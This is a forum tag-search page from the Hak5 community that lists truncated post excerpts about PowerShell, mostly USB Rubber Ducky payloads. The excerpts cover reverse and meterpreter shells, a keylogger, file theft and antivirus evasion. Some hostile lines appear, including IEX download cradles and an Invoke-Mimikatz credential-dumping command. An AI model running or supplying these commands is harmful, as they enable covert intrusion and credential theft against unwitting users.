Jump to content

Search the Community

Showing results for tags 'powershell'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Im building a rubber ducky script but im not very good with powershell, so im using the powershell scripts from: https://github.com/powershellmafia/powersploit/ and i need to use the persistence module inn my script and i dont understand how can i import the module. Can anyone help me ?
  2. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the exec
  3. Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using
  4. Hello friends! Today I am going to show you a very simple 11 line USB Rubber Ducky Keylogger hack using powershell! Super simple. What this does is it starts a powershell as a hidden window, so the actual application will not be visible on the taskbar. Only through the Task Manager. Then it downloads a simple script from github into memory, then executes the keylogger command. The second to last line, after "-LogPath" input the location you want it to place the keylog file. And the "-Timeout" command is how many minutes you want to command to run. Here is the code: DELAY 500
  5. Hi guys, I have the following PowerShell script, which finds the list of groups a user is a member of, formats them to name only, and then is supposed to list yes or no to which groups begin with the '@' symbol; $CurrentGroups = Get-ADuser JOEBLOGGS -property MemberOf | % {$_.MemberOf | Get-ADGroup | select Name | sort name} foreach($Group in $CurrentGroups) { if("$Group" -match "`@") { echo Yep $Group } else { echo Nope $Group }} User JOEBLOGGS is a member of; @Testone @Testtwo Testthree Testfour On running this script, I would expect the
  6. Hi All, I'm looking for help with powershell commands. I've got my duckberry pi working, and the plan is to have a duckyscript use powershell to download payloads from a http or ftp server (which is running on my android phone) on a local network. I've got SimpleHttpServer and Android FTPServer hosting a text file, and they seem to be working, because I can access the test file via browser at ip:port & through FileZilla. The closest I've gotten thus far to making this happen with powershell is this command: powershell "IEX (New-Object Net.Webclient).DownloadString('htt
  7. Reverse TCP Shell using Powershell Only Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/bas
  8. Hello Guys. I'm new in this community so nice to meet you! I'm very happy to write finally on this forum I've been reading for a while by now. I finally managed to built my Twin Ducky able to steal targeted files, following the lasts episodes of DK (2112-2113-2114) So of course I started enjoying to play with the parameters of e.cmd, and I was able to manage (unfortunately I have to admit, without any coding skills, don't get mad at me :P) to teach the rubber ducky not to steal just PDFs in the Documents folder but also to look for any pdf and doc file in all the folders belonging t
  9. Afternoon all - I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it. Anywho - to test I copied the powershell script I found on another hak5 forum locally and call it like the below powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds" Well, I get the following error and i know why: ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list When I read thru the powershell script, it's missing the privilege line: "privilege::debug" The below portion of the
  10. !! EDIT !! !! Now updated so it should be very fast and effective !! !! This is a remake of my bashbunny script so it works on the rubberducky too https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber !! Hello everyone! I made this nice script that gives you a lot of information about your victims computer and stores it on the rubberducky if it runs twin duck firmware. for example their ip and public ip Change it as much as you want, but please make me as source since I spent around 15 hours on this It executes in aroun
  11. Hi, I have been playing a little with Powershell and have come up with a proof-of-concept using Powershell for APT. I have a full description of the code here: http://www.cron.dk/powershell-hacking/ Please drop me a note if you find it interesting. Best regards, Alex
  12. Hi all, I have the following line of code in a PowerShell file, intended to remove a user from all Active Directory groups beginning with an @ symbol; Get-ADGroup -Filter 'name -like "@*"' | Remove-ADGroupMember -Members $UserID It actually works fine, and successfully removes them from the correct groups, however the script locks my admin account every time it's run. Weird! I suspect it's to do with it 'using up' my Kerberos authentication tokens (it uses too many, as it runs for every single AD group beginning with @), or it thinks I'm trying to do something malicious becaus
  13. Hi all, I'm using... Get-ADuser $UserID -property MemberOf | % {$_.MemberOf | Get-ADGroup | select Name | sort name} ...to nicely list all the of the Active Directory groups that a user is a member of, in an easy-to-read format. I'm trying to only list the groups that begin with an @ sign. So instead of... @Group 1 @Group 2 Group 3 Group 4 ...I would get just... @Group 1 @Group 2 I'm then looking to remove these groups from the user's account. So, in summary; Get only the MemberOf groups beginning with @, for a user remove user from these groups How would I go about this? I've been
  14. Hi all, I'm looking to make a script, in either batch or Powershell, that will give a user access to a folder and all folders leading down to it. So, it would; Ask for input of Active Directory UserID Ask for input of a folder path List all of the security groups for the first folder in the path and allow selection of which one the AD UserID will be added to. List all of the security groups for the second folder in the path and allow selection of which one the AD UserID will be added to. List all of the security groups for the third folder in the path and allow selection of which one the AD
  15. xor-function


    I just wanted to let everybody here know about ps2exe, if you don't already. You can find it on TechNet if you search for it. What it does is compile a script to an executable by using a c# source code template that runs the script using the system.management.automation assembly. Since it uses a class library it stands a pretty good chance on bypassing any restrictions on the Powershell.exe program file. This is an example script I compiled using ps2exe. function start-download { [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } IEX (New-Object System
  16. Going to try out my rubber ducky on a Windows 7 machine. What can I utilize if the target Windows 7 machine has powershell disabled and won't allow it to be installed or ran? I'm pretty sure it is being blocked by group policy
  17. Below are instructions for using Veil-Evasion to produce a Windows Powershell payload for a Meterpeter reverse TCP connection and injecting it using a USB Rubber Ducky. This is my first tutorial post, so if my formatting is a bit off... too bad ;) This method has a few benefits over the method provided using the "Simple-Ducky" program. It is injected completely through text input typed in by the Ducky into the Windows Command Shell It does not require the target computer to download a compiled file from a web server to set up the connection. You do not have to host a web server for the pa
  18. I've been working on trying to create stealthy attacks with the Rubber Ducky. I've found a way to hide the powershell console while keeping focus (which is obviously needed for input from the Ducky). The basic idea is to move the console to the edge of the screen and then shrink the size of the console and it actually disappears. Here are the commands for the basic idea: REM Once powershell is up and running ALT SPACE STRING m LEFTARROW REPEAT 50 STRING [console]::WindowHeight=1 ENTER STRING [console]::WindowWidth=1 ENTER I found that shrinking the console size is faster than moving the con
  19. placeholder This payload will automatically eject all the CD trays to the target system at the beginning of every hour. The way I go about this is to create a powershell script from command line and then execute to as a background process with the "powershell -windowstyle hidden" command. I can see a lot of potential in having this run at startup, but I had a wave of mercy when I wrote the script. Enjoy REM Name: Poltergeist REM Author: theGANOUSH REM Purpose: To mess with my coworkers by forcing their CD drives to open at the start of every hour. REM The PowerShell code was found and m
  20. Hi, Anyone Know of any PowerShell Script UAC Bypass ? Any Idea how to implement in any existing tool or any other way bypassing UAC in powershell ? Thanks, Aksel.
  21. This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability Power Shell Scripts for the Hak5 Ducky 1) Fast Meterpreter 2) Reverse Meterpreter 3) Dump Domain and Local Hashes 4) Dump Lsass Process 5) Dump Wifi Passwords 6) Wget Execute 99) Exit All payloads are written in powershell so nothing should be caught by AV https://github.com/b00s
  • Create New...